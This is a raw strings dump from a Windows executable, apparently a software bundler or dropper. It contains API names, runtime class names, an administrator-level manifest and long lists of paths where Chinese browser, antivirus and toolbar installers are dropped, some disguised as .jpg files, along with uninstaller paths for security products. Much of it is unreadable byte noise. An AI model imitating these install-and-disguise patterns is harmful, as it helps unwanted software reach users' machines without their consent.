7"7&7*7.72767:7>7B7F7J7N7R7V7Z7^7b7f7j7n7r7v7z7~7
7#7'7+7L7l7t7x7|7
7+7@7n7
7*7:7p7z7
7&787O7[7c7m7x7
7$7D7L7P7T7X7\7`7d7h7l7
7^7e7w7
7@7O7T7t7
7#7W7e7|7
7"878D8d8f9n9
7	8:8K8
7.8>8P8n8
7_8k8x8
7 9$9(9,9094989<9@9D9H9L9P9T9X9`9d9l9p9t9x9|9
7A7M7f7p7z7
7b8f8j8n8r8v8z8~8
<#=-=7=?=E=S=n=
='>7>f>v>
=7=G=~=
7H7a7j7|7
7K8h8m8~8
;#;);7;=;K;V;j;{;
7Project1
=/=7=U=]=x=
7W7;8{9
80M0T0d0t0|0
868X8f8
878?8Z8b8~8
8(8084888<8@8D8H8L8P8T8X8\8`8
8&808;8?8P8T8X8r8z8
8*838?8D8O8Z8e8p8{8
8*8.82868:8>8B8F8X8i8m8~8
8&8+848:8I8N8S8e8t8
8 8)848?8Q8b8j8y8
8&8.868>8F8N8V8^8f8n8v8~8
8 8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
8 8$8(8,8084888<8@8D8H8
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
8 8$8(8,8084888<8@8D8X8d8h8t8x8
8"8&8*8.82868:8>8B8F8J8N8R8V8Z8^8b8f8j8n8
8"8&8*8.82868:8>8B8F8J8N8R8V8Z8^8b8f8j8n8r8v8
8"888@8N8`8p8y8
8 8$888X8`8d8h8l8p8t8x8|8
8$8)8B8G8T8`8n8
8*8<8I8M8\8s8|8
8"8N8s8
8!949d9i9
8?9O9f9
8A8H8h8
>(>8>E>U>
:8:[:g:~:
=!=8=J=
<$<.<8<J<_<k<s<}<
?"?*?8?<?P?c?g?x?
8Registry
>8>?>u>
9(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
9	:':0:W:`:
939>9G9U9h9
949D9T9\9`9d9h9l9p9t9x9|9
^}%95 
^}%95(
959D9[9j9~9
%9, %8
98:=:v:
9+90989V9h9
9 9%92979D9I9V9[9h9m9z9
9&9.969>9F9N9V9^9f9n9v9~9
9&9.969>9F9S9_9l9~9
9 9,989<9M9U9o9w9
9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9
9 9$9(9,9094989<9B9
9 9$9(9,90949L9l9t9x9|9
9"9&9*9.92969:9>9B9F9J9b9p9t9
9"9&9*9.92969:9>9B9F9J9N9R9V9Z9^9b9f9j9n9r9v9z9~9
9"9&9*9.9<9K9O9]9a9e9~9
9'9+999A9Z9b9f9
9!9+9<9A9Q9X9b9n9x9
9"9*9@9R9V9e9m9
9"9/9C9
9,9>9D9]9
9,9A9$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:
9+9F9L9`9e9E:j:w:
9,:9:h:
9-9H9Q9l9
9.9J9X9\9d9h9t9x9
;9;=;A;E;_;g;k;
9B9Z9r9
9c:o:v:
9,:<:D:L:T:\:d:l:t:|:
9D:M:n:
=*=9=H=P=
9L:p:&;6;
9m9q9u9y9
?9?[?o?
9O:w:~:
9t$dt7
=*>9>V>
9X:f:|:
a0k0q0u0{0
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abnormal program termination
ACanvas
Accept
Accept: */*
Action
ActivateKeyboardLayout
ActiveControl
ActiveX
ActnList
AC:\WINDOWS\system32\ie.log
AdjustWindowRectEx
ADSafe3.lnk
advapi32.dll
Advapi32.dll
ADVAPI32.dll
AfxControlBar42s
AfxFrameOrView42s
AfxMDIFrame42s
AfxOldWndProc423
AfxOleControl42s
AfxWnd42s
   Aguangshushurufazhen
="=*=.=A=I=M=e=m=q=
>A?I?O?[?k?
>A>J>X>
akBottom
akLeft
akRight
alBottom
alClient
alCustom
AlignDIA
	Alignment@
	AlignmentX'D
alLeft
alNone
AlphaBlendT
AlphaBlendValue@
alRight
An application has made an attempt to load the C runtime library incorrectly.
: :-:A:N:b:t:~:
Anchors
AnimateWindow
anonymous
;*;/;<;A;N;S;`;e;r;w;
ANSI_CHARSET
Apartment
AppendMenuA
ARABIC_CHARSET
Array 
AsDefault=1
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="2345.com" type="win32"></assemblyIdentity><description>2345.com</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS></application></compatibility></assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXC:\Program Files\Common Files\Microsoft Shared\autoinstall.exe
:":::A:T:l:
AtlAxWinInit
atl.dll
ATL.DLL
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
.?AUCThreadData@@
August
.?AUIMessageFilter@@
.?AUIUnknown@@
	AutoCheck
AutoConnect`bE
AutoHotkeys
AutoHotkeysX'D
AutoLineReduction
	AutoMerge
	AutoPopup
AutoScroll
AutoSelect
AutoSize
AutoSize`
.?AV_AFX_BASE_MODULE_STATE@@
.?AV_AFX_CTL3D_STATE@@
.?AV_AFX_CTL3D_THREAD@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_OLE_STATE@@
.?AV_AFX_THREAD_STATE@@
.?AV_AFX_WIN_STATE@@
.?AVbad_alloc@std@@
.?AVbad_exception@std@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCommonDialog@@
.?AVCDC@@
.?AVCDialog@@
.?AVCException@@
.?AVCGdiObject@@
.?AVCHandleMap@@
.?AVCMapPtrToPtr@@
.?AVCMemoryException@@
.?AVCMenu@@
.?AVCNoTrackObject@@
.?AVCNotSupportedException@@
.?AVCObject@@
.?AVCOleBusyDialog@@
.?AVCOleDialog@@
.?AVCOleMessageFilter@@
.?AVCResourceException@@
.?AVCSimpleException@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.?AVCTempMenu@@
.?AVCTempWnd@@
.?AVCTestCmdUI@@
.?AVCUserException@@
.?AVCWinApp@@
.?AVCWinThread@@
.?AVCWnd@@
.?AVexception@std@@
.?AVlength_error@std@@
.?AVlogic_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVXMessageFilter@COleMessageFilter@@
:&;A;];x;
AxCtrls
,\B>&\
;B0uGj
bad allocation
bad exception
BaiduAnTray.exe
\BaiduAnUpdate.exe
  baiduSD
BaiduSdTray.exe
\BaiduSdUpdate.exe
   baiduSE
  baiduWS
BALTIC_CHARSET
 Base Class Array'
 Base Class Descriptor at (
__based(
BBFFf;
bbs.crsky.com
bbs.mumayi.net
bbs.pcbeta.com
bbs.ylmf.net
bdLeftToRight
bdRightToLeft
bdRightToLeftNoAlign
bdRightToLeftReadingOnly
beBottom
BeginPaint
>:>B>]>e>i>
beLeft
beRight
BevelEdges
BevelInnerx
	BevelKind
BevelOuter
?&?>?B?F?J?N?R?V?c?
>B?F?J?R?X?
,\B>'\G
BiDiMode
BiDiModelJA
biHelp
biMaximize
biMinimize
biSystemMenu
BitBlt
Bitmap
Bitmap$%D
;$;B;J;e;m;q;
bkFlat
bkNone
bkSoft
bkTile
blackmoon
BlackMoon RunTime Error:
;Blu	3
BlueSoftSetup_bsugqr.exe
Boolean
BorderIcons
BorderStyle
BorderWidth
BP_^[]
<B=R=e=
Brush<
bsBDiagonal
bsClear
bsCross
bsDiagCross
bsDialog
bsFDiagonal
bsHorizontal
bsNone
bsSingle
bsSizeable
bsSizeToolWin
bsSolid
bsToolWindow
bsVertical
<(<><B<S<[<_<x<
Button
Buttons
ButtonSize
,\B>(\v
bvNone	bvLowered
bvRaised
bvSpace
ByRef 
:"C333
"$c33333
c333333
"C333333
C3333333
C33333833?33
"C3338
c33*C333
"C8338
caFree
caHide
calc.exe
CallHelp
CallNextHookEx
CallWindowProcA
caMinimize
Cancel
CanClose
CanDock
caNone
Caption
Caption<
Cardinal
Category
C:\bdkv_install.log
C:\BlueSoftSetup.log
CCmdTarget
C ;C$s
Cd;Cpt
__cdecl
CDialog
C:\Documents and Settings\administrator\
C:\Documents and Settings\Administrator\
C:\Documents and Settings\Administrator\Application Data\360se6\Application\360se.exe
C:\Documents and Settings\Administrator\Application Data\360se6\Application\6.3.1.153\installer\setup.exe
C:\Documents and Settings\Administrator\Local Settings\Application Data\Kingsoft\WPS Office\9.1.0.4463\utility\uninst.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\bluefiles
C:\Documents and Settings\All Users\
C:\DuDu\uninstall.exe
CException
:C:f:n:
CGdiObject
?*?C?G?K?O?d?
CharCase
CharLowerA
CharLowerBuffA
CharNextA
Charset
CharToOemA
Ch;Ctt
Checked
CheckedValue
CheckMenuItem
CheckMenuRadioItem
CHINESEBIG5_CHARSET
Chrome=0
CHYZ]_^[
<&=C=H=z=O>
=C>J>a>e>i>m>q>u>
CjC338
$:Cjt_
ckAttachToInterface	OleServer
ckNewInstance
ckRemote
ckRunningInstance
ckRunningOrNew
cl3DDkShadow
cl3DLight
clActiveBorder
clActiveCaption
clAppWorkSpace
clAqua
Classes
^Classes
 Class Hierarchy Descriptor'
clBackground
clBlack
clBlue
clBtnFace
	clBtnFace
clBtnHighlight
clBtnShadow
clBtnText
clCaptionText
clCream
clDefault
clFuchsia
clGradientActiveCaption
clGradientInactiveCaption
clGray
clGrayText
clGreen
clHighlight
clHighlightText
clHotLight
Client
ClientHeight<
ClientToScreen
ClientWidth
clInactiveBorder
clInactiveCaption
clInactiveCaptionText
clInfoBk
clInfoText
Clipbrd
clLime
clMaroon
clMedGray
clMenu
clMenuBar
clMenuHighlight
clMenuText
clMoneyGreen
clNavy
clNone
clOlive
CloseEnhMetaFile
CloseHandle
ClosePrinter
CloseThemeData
clPurple
__clrcall
     cls
clScrollBar
CLSID\%1
CLSID\%1\AuxUserType\2
CLSID\%1\AuxUserType\3
CLSID\%1\DefaultExtension
CLSID\%1\DefaultIcon
CLSID\%1\DocObject
CLSID\%1\InprocHandler32
CLSID\%1\InProcServer32
CLSID\%1\Insertable
CLSID\%1\LocalServer32
CLSID\%1\MiscStatus
CLSID\%1\Printable
CLSID\%1\ProgID
CLSID\%1\Verb\0
CLSID\%1\Verb\1
CLSIDFromProgID
CLSIDFromString
clSilver
clSkyBlue
clTeal
;CLtX3
clWhite
clWindow
clWindowFrame
clWindowText
clYellow
CMapPtrToPtr
CMemoryException
CNotSupportedException
CoAddRefServerProcess
CObject
CoCreateInstance
CoCreateInstanceEx
CoFreeUnusedLibraries
CoGetClassObject
CoInitialize
CoInitializeEx
COleBusyDialog
COleDialog
Color<
Colorh
CombineRgn
combobox
comctl32.dll
COMCTL32.dll
COMCTL32.DLL
comdlg32.dll
Command
CommCtrl
commctrl_DragListMsg
commdlg_FindReplace
commdlg_help
CompareStringA
 Complete Object Locator'
ComSpec
ComStrs
[Config]
Connection: close
ConnectKind
CONOUT$
Constraints
Consts
Contnrs
ControlData
ControlOfs%.8X%.8X
Controls
&Controls
Controls	
Controlsd
`copy constructor closure'
CopyEnhMetaFileA
CopyMode0
CopyRect
CoRegisterMessageFilter
CoReleaseServerProcess
CoResumeClassObjects
CoRevokeClassObject
CorExitProcess
CoSuspendClassObjects
CoTaskMemFree
CoUninitialize
C:\Program Files\2345Explorer
C:\Program Files\2345Explorer\Uninstall.exe
C:\Program Files\2345Pic
C:\Program Files\2345Pic\Uninstall.exe
C:\Program Files\91yGame\unins000.exe
C:\Program Files\ADSafe3\ADSafe.exe
C:\Program Files\ADSafe3\uninst.exe
C:\Program Files\ainqngz3.9\uninstall.exe
C:\Program Files\ainqngz4.7\uninstall.exe
C:\Program Files\Baidu\BaiduAn\2.1.0.1154\BaiduAnUpdate.exe
C:\Program Files\Baidu\BaiduAn\2.3.0.2225\BaiduAnUpdate.exe
C:\Program Files\baidu\BaiduBrowser\baidubrowser.exe
C:\Program Files\Baidu\BaiduSd\1.5.0.1092\BaiduSdUpdate.exe
C:\Program Files\Baidu\BaiduSd\1.8.0.1196\BaiduSdUpdate.exe
C:\Program Files\Baofeng\StormPlayer\Uninst.exe
C:\Program Files\BlueBox
C:\Program Files\BlueBox\uninst.exe
C:\Program Files\Common Files
C:\Program Files\Common Files\
C:\Program Files\Common Files\asdqw_3104-48740.exe
C:\Program Files\Common Files\baidu.exe
C:\Program Files\Common Files\baidu.jpg
C:\Program Files\Common Files\bdbrowser_7654_356.exe
C:\Program Files\Common Files\bdbrowser_7654_356.jpg
C:\Program Files\Common Files\bdsd_1454_7654_356.exe
C:\Program Files\Common Files\bdsd_1454_7654_356.jpg
C:\Program Files\Common Files\bdws_1454_7654_356.exe
C:\Program Files\Common Files\bdws_1454_7654_356.jpg
C:\Program Files\Common Files\gswb_1454_7654_356.exe
C:\Program Files\Common Files\gswb_1454_7654_356.jpg
C:\Program Files\Common Files\Microsoft Shared\2345pack.ini
C:\Program Files\Common Files\Microsoft Shared\2345.txt
C:\Program Files\Common Files\Microsoft Shared\acbbb.txt
C:\Program Files\Common Files\Microsoft Shared\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
C:\Program Files\Common Files\Microsoft Shared\pp3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
C:\Program Files\Common Files\qhse_7654_5943.exe
C:\Program Files\Common Files\qhse_7654_5943.jpg
C:\Program Files\Common Files\qqbrowser_7654_356.exe
C:\Program Files\Common Files\qqbrowser_7654_356.jpg
C:\Program Files\Common Files\qq.exe
C:\Program Files\Common Files\td1.exe
C:\Program Files\Common Files\td.exe
C:\Program Files\Common Files\Tiandi_6733.exe
C:\Program Files\Common Files\ucbrowser_7654_356.exe
C:\Program Files\Common Files\ucbrowser_7654_356.jpg
C:\Program Files\Doyo\DyUninstall.exe
C:\Program Files\GSInput
C:\Program Files\GSInput\3.0.1.0512\uninst.exe
C:\Program Files\gssoft\gswb\2.8.1.1120\uninst.exe
C:\Program Files\HaoZip
C:\Program Files\HaoZip\Uninstall.exe
C:\Program Files\iQIYI\QiyiInstaller.exe
C:\Program Files\JJ
C:\Program Files\kingsoft\kingsoft antivirus\uni0nst.exe
C:\Program Files\liebao\liebao.exe
C:\Program Files\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
C:\Program Files\PPStream\unpps.exe
C:\Program Files\SogouExplorer\SogouExplorer.exe
C:\Program Files\Tencent\QQPCMgr\8.8.10756.232\Uninst.exe
C:\Program Files\UCBrowser\UCBrowser.exe
C:\Program Files\UCBrowser\UCBrowser.exe --wow-launch-from=desktop
C:\Program Files\UCBrowser\Uninstall.exe
C:\Program Files\yyfm0529\201407051412\Unins.exe
crAppStart
crArrow
crCross
crDefault
crDrag
CreateBitmap
CreateBrushIndirect
CreateCompatibleBitmap
CreateCompatibleDC
CreateDialogIndirectParamA
CreateDIBitmap
CreateDIBSection
CreateDirectoryA
CreateEnhMetaFileA
CreateEventA
CreateFileA
CreateFontIndirectA
CreateHalftonePalette
CreateIcon
CreateMenu
CreateMutexA
CreateMutexW
CreatePalette
CreatePatternBrush
CreatePenIndirect
CreatePopupMenu
CreateProcessA
CreateRoundRectRgn
CreateShortcut
CreateSolidBrush
CreateStreamOnHGlobal
CreateThread
CreateToolhelp32Snapshot
CreateWaitableTimerA
CreateWindowExA
CResourceException
crHandPoint
crHelp
crHourGlass
crHSplit
crIBeam
crMultiDrag
crNoDrop
crSize
crSizeAll
crSizeNESW
crSizeNS
crSizeNWSE
crSizeWE
crSQLWait
- CRT not initialized
crUpArrow
crVSplit
CryptAcquireContextA
CryptCreateHash
CryptDestroyHash
CryptGetHashParam
CryptHashData
CryptReleaseContext
=(=?=C=T=d=t=|=
CTempDC
CTempGdiObject
CTempMenu
CTempWnd
Ctl3DlJA
$;Ctt?
Currency
Cursor
C:\user\All Users\
CUserException
C:\users\administrator\
C:\users\Administrator\
C:\users\Administrator\Application Data\360se6\Application\360se.exe
C:\users\Administrator\Application Data\360se6\Application\6.3.1.153\installer\setup.exe
C:\Users\Administrator\Desktop\
C:\users\Administrator\Local Settings\Application Data\Kingsoft\WPS Office\9.1.0.4463\utility\uninst.exe
C:\users\Administrator\Local Settings\Temp\bluefiles
C:\users\All Users\
C:\users\All Users\Desktop\
CUxTheme
=.>C>V>
CVariants
CWinApp
C:\WINDOWS\system32\taskmgr.exe
C:\WINDOWS\system\360se
C:\WINDOWS\system\360.txt
C:\WINDOWS\system\ADSafe
C:\Windows\system\APP
C:\Windows\system\APPP
C:\WINDOWS\system\baidusd2.txt
C:\WINDOWS\system\baiduSE.txt
C:\WINDOWS\system\baiduweishi2.txt
C:\WINDOWS\system\guan2.txt
C:\WINDOWS\system\leibao
C:\WINDOWS\system\QQIE.txt
C:\WINDOWS\system\uc
C:\WINDOWS\system\uc.txt
CWinThread
C(_^[Y]
<<=@=D=
D1e1R2
@.data
"dc3333833
D*C33383
:DC33:""$8
"DDB""$3
DDDDDD
DDDDDDDDD@
DDDDDDDDDDDDDD
DDDDDDDDDGpw
dddd, MMMM dd, yyyy
? ?$?(?,?D?d?l?p?t?x?|?
December
Decimal
DecodePointer
Default
DEFAULT_CHARSET
`default constructor closure'
DefaultMonitor
DefFrameProcA
DefMDIChildProcA
DefWindowProcA
DefWindowProcW
 delete
 delete[]
Delete
DeleteCriticalSection
DeleteDC
=deleted; expires=
DeleteEnhMetaFile
DeleteFileA
DeleteMenu
DeleteObject
Delphi%.8X
Delphi Component
Delphi Picture
DesignSize
Desk=0
DestroyCursor
DestroyIcon
DestroyMenu
DestroyWindow
;<;D;H;L;P;T;X;\;`;d;
?<?D?H?L?P?T?X?\?`?d?h?|?
=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
<<<D<H<L<P<T<X<\<`<d<t<
D$HPkD$TdPV
Dialogs
Dispatch
DispatchMessageA
DISPLAY
dkDock
dkDrag
DLL ERROR
D$LPkD$XdPV
=$=D=L=P=T=X=\=`=d=h=l=|=
dmActiveForm
dmAutomatic
	dmDesktop	dmPrimary
dmMainForm
dmManual
%.*d\o@
DockClient
DockSite
DocumentPropertiesA
; domain=
DOMAIN error
Double
:=;D;o;x;
D:\Program Files\Tencent\QQPCMgr\8.12.11701.227\Uninst.exe
D:\Program Files\Tencent\QQPCMgr\8.8.10756.232\Uninst.exe
D$@PVj
DragAcceptFiles
DragCursor
DragFinish
DragKind
DragMode
DragObject
DragQueryFileA
DrawEdge
DrawFrameControl
DrawIcon
DrawIconEx
DrawMenuBar
DrawTextA
DrawThemeBackground
DrawThemeEdge
DrawThemeIcon
DrawThemeParentBackground
DrawThemeText
dsDragEnter
dsDragLeave
dsDragMove
dStdCtrls
D$<SUV
>D?T?f?z?
D$Tj\P
;<;d;T=_=m=
>D?]?w?
D$,WPQR
D$$WPV
D$XQRP
~D_^[Y]
`dynamic atexit destructor for '
`dynamic initializer for '
EAbstractError
EAccessViolation
EActnList
EAssertionFailed
EASTEUROPE_CHARSET
EBitsError
EClassNotFound
ecLowerCase
ecNormal
EComponentError
	EControlC
EConvertError
ecUpperCase
&Edit,0,2
EDivByZero
	EExternal
EExternalException
EFCreateError
EFilerError
EFileStreamError
EFOpenError
EHeapException
EHelpSystemException
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
EInOutError
	EIntError
EIntfCastError
EIntOverflow
EInvalidCast
EInvalidGraphicOperation
EInvalidGraphicP
EInvalidOp
EInvalidOperation
EInvalidPointer
EListError
EMathError
Embedded Object
Embed Source
EMenuError
|$( EMFt
Enabled
Enabled|
Enabled0
EnabledT
EnableMenuItem
EnableScrollBar
EnableThemeDialogTexture
EnableTheming
EnableWindow
EncodePointer
EndDialog
EndPaint
EnterCriticalSection
EnumCalendarInfoA
EnumDisplayMonitors
EnumThreadWindows
EnumWindows
	EOleError
EOleException
EOleSysError
EOSError
EOutOfMemory
EOutOfResourcesHPA
	EOverflow
EPrivilege
E$PVSj
EqualRect
ERangeErrorHt@
EReadError
EResNotFound
ESafecallException
Escape
EStackOverflow
EStreamError
EStringListError
EThread
EUnderflow
EVariantArrayCreateError
EVariantArrayLockedError
EVariantBadIndexError
EVariantBadVarTypeError 
EVariantDispatchError
EVariantError
EVariantInvalidArgError
EVariantInvalidOpError
EVariantNotImplError
EVariantOutOfMemoryError
EVariantOverflowError
EVariantTypeCastError
EVariantUnexpectedError
EWriteError
	Exceptionxq@
ExcludeClipRect
ExitProcess
Explorer=1
ExtActns
ExtCreateRegion
ExtCtrls
ExtDlgs
ExtTextOutA
EZeroDivide
F,_^][
@@f98u
f9z.vk
__fastcall
fC333?3
fC33333
:F:c:n:y:
FComObj
fDFfC338
February
F*F333383
fff3333
FileName
FileNameW
FileTimeToDosDateTime
FileTimeToLocalFileTime
FillRect
FindClose
FindFirstFileA
FindFirstFileW
FindNextFileA
FindResourceA
FindWindowA
FindWindowExA
;F<J<N<R<V<n<|<
FlatSB
FlatSB_EnableScrollBar
FlatSB_GetScrollInfo
FlatSB_GetScrollPos
FlatSB_GetScrollProp
FlatSB_GetScrollRange
FlatSB_SetScrollInfo
FlatSB_SetScrollPos
FlatSB_SetScrollProp
FlatSB_SetScrollRange
FlatSB_ShowScrollBar
- floating point not loaded
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
FocusControl0
Font.Charset
Font.Color
Font.Height
	Font.Name
Font.Style
FormatMessageA
FormCreate
Forms$
Forms\
Forms	
	FormStyle<
FormsU
	fpDefault
fpFixed
FPUMaskValue
fpVariable
FrameRect
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
FreeResource
Friday
frmProgress
fsBold
f;sDtsf
fsItalic
fsMDIChild	fsMDIForm
fsNormal
fsStayOnTop
fsStrikeOut
fsUnderline
FtpPutFileA
@?:F?v
F(Z_^[
;(<G<]<
GAIsProcessorFeaturePresent
:GauOFKu
GB2312_CHARSET
>?>G>d>
gdi32.dll
GDI32.dll
GetACP
GetActiveObject
GetActiveWindow
GetAsyncKeyState
GetBitmapBits
GetBrushOrgEx
GetCapture
GetClassInfoA
GetClassLongA
GetClassNameA
GetClientRect
GetClipboardData
GetClipBox
GetCommandLineA
GetCommandLineW
GetComputerNameA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentPositionEx
GetCurrentProcess
GetCurrentProcessId
GetCurrentThemeName
GetCurrentThread
GetCurrentThreadId
GetCursor
GetCursorPos
GetDateFormatA
GetDCEx
GetDCOrgEx
GetDesktopWindow
GetDeviceCaps
GetDIBColorTable
GetDIBits
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetDlgCtrlID
GetDlgItem
GetEnhMetaFileBits
GetEnhMetaFileDescriptionA
GetEnhMetaFileHeader
GetEnhMetaFilePaletteEntries
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetErrorInfo
GetFileAttributesW
GetFileSize
GetFileType
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFocus
GetFolder
GetForegroundWindow
GetFullPathNameA
GetFullPathNameW
GetIconInfo
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardState
GetKeyboardType
GetKeyNameTextA
GetKeyState
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetLocalTime
GetLongPathNameA
GetMenu
GetMenuCheckMarkDimensions
GetMenuDefaultItem
GetMenuInfo
GetMenuItemCount
GetMenuItemID
GetMenuItemInfoA
GetMenuItemRect
GetMenuState
GetMenuStringA
GetMessageA
GetMessagePos
GetMessageTime
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetMonitorInfo
GetMonitorInfoA
GetMonitorInfoW
GetNativeSystemInfo
GetNextDlgTabItem
GetObjectA
GetOEMCP
GetPaletteEntries
GetParent
GetPixel
GetPrivateProfileStringW
GetProcAddress
GetProcessHeap
GetProcessVersion
GetProcessWindowStation
GetPropA
GetScrollInfo
GetScrollPos
GetScrollRange
GetStartupInfoA
GetStartupInfoW
GetStdHandle
GetStockObject
GetStringTypeA
GetStringTypeExA
